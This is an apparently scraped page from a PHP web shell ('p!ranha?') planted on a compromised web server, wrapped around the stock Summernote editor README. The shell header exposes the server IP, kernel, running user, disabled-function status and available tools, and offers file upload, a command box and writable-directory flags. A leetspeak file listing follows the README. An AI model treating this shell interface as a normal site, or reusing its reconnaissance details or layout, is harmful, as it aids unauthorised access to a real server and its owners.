p!ranha?
Server IP : 103.169.32.36  /  Your IP : 216.73.217.13
Web Server : Apache
System : Linux web.dpmptsp 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/dpmptsp/public_html/newsigniter/assets/back/vendors/summernote_v/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : /home/dpmptsp/public_html/newsigniter/assets/back/vendors/summernote_v/README.md
# Summernote

Super simple WYSIWYG Editor.

[![Build Status](https://travis-ci.org/summernote/summernote.svg?branch=develop)](http://travis-ci.org/summernote/summernote)
[![npm version](https://badge.fury.io/js/summernote.svg)](http://badge.fury.io/js/summernote)
[![Coverage Status](https://coveralls.io/repos/summernote/summernote/badge.svg?branch=develop&service=github)](https://coveralls.io/github/summernote/summernote?branch=develop)

### Summernote
Summernote is a JavaScript library that helps you create WYSIWYG editors online.

Home page: <https://summernote.org>

### Why Summernote?

Summernote has a few special features:

* Paste images from clipboard
* Saves images directly in the content of the field using base64 encoding, so you don't need to implement image handling at all
* Simple UI
* Interactive WYSIWYG editing
* Handy integration with server
* Supports Bootstrap 3 and 4 integrities
* Lots of [plugins and connectors](https://github.com/summernote/awesome-summernote) provided together

### Installation and dependencies

Summernote is built on [jQuery](http://jquery.com/).

#### 1. Include JS/CSS

Include the following code in the `<head>` tag of your HTML:

```html
<!-- include libraries(jQuery, bootstrap) -->
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/css/bootstrap.min.css" />
<script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.4.1/js/bootstrap.min.js"></script>

<!-- include summernote css/js-->
<link href="summernote.css" rel="stylesheet">
<script src="summernote.js"></script>
```

#### 2. Target a element

Then place a `div` tag somewhere in the `body` tag. This element will be replaced with the summernote editor.

```html
<div id="summernote">Hello Summernote</div>
```

#### 3. Summernote it!

Finally, run this script after the DOM is ready:

```javascript
$(document).ready(function() {
  $('#summernote').summernote();
});
```

For more examples, please visit to [homepage](http://summernote.org/examples).

### API

`code` - get the HTML source code underlying the text in the editor:

```javascript
var html = $('#summernote').summernote('code');
```

For more detail about API, please refer to [document](http://summernote.org/getting-started/#basic-api).

#### Warning - code injection

The code view allows the user to enter script contents. Make sure to filter/[sanitize the HTML on the server](https://github.com/search?l=JavaScript&q=sanitize+html). Otherwise, an attacker can inject arbitrary JavaScript code into clients.

### For contributing
https://github.com/summernote/summernote/blob/develop/.github/CONTRIBUTING.md

### Contacts
* Facebook user group: https://www.facebook.com/groups/summernote
* Summernote Slack: [Join the Summernote Slack community](https://communityinviter.com/apps/summernote/summernote)

### License
Summernote may be freely distributed under the MIT license.
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
January 15 2025 01:57:16
0 / 0
0755
.github
--
January 03 2025 03:29:12
0 / 0
0755
config
--
January 03 2025 03:29:12
0 / 0
0755
examples
--
January 03 2025 03:29:13
0 / 0
0755
lang
--
January 03 2025 03:29:14
0 / 0
0755
plugin
--
January 03 2025 03:29:14
0 / 0
0755
src
--
January 03 2025 03:29:16
0 / 0
0755
test
--
January 03 2025 03:29:16
0 / 0
0755
.agignore
0.021 KB
December 31 2020 02:24:50
0 / 0
0644
.editorconfig
0.245 KB
December 31 2020 02:24:50
0 / 0
0644
.eslintrc
0.512 KB
December 31 2020 02:24:50
0 / 0
0644
.gitignore
0.499 KB
December 31 2020 02:24:50
0 / 0
0644
.npmignore
0.105 KB
December 31 2020 02:24:50
0 / 0
0644
.travis.yml
0.721 KB
December 31 2020 02:24:50
0 / 0
0644
LICENSE
1.101 KB
December 31 2020 02:24:50
0 / 0
0644
MAINTAIN.md
0.955 KB
December 31 2020 02:24:50
0 / 0
0644
README.md
2.966 KB
December 31 2020 02:24:50
0 / 0
0644
index.html
1.33 KB
December 31 2020 02:24:50
0 / 0
0644
karma.ci.conf.js
2.887 KB
December 31 2020 02:24:50
0 / 0
0644
karma.conf.js
1.232 KB
December 31 2020 02:24:50
0 / 0
0644
karma.saucelabs.conf.js
2.568 KB
December 31 2020 02:24:50
0 / 0
0644
package.json
3.204 KB
December 31 2020 02:24:50
0 / 0
0644
postcss.config.js
0.312 KB
December 31 2020 02:24:50
0 / 0
0644
tsconfig.json
0.191 KB
December 31 2020 02:24:50
0 / 0
0644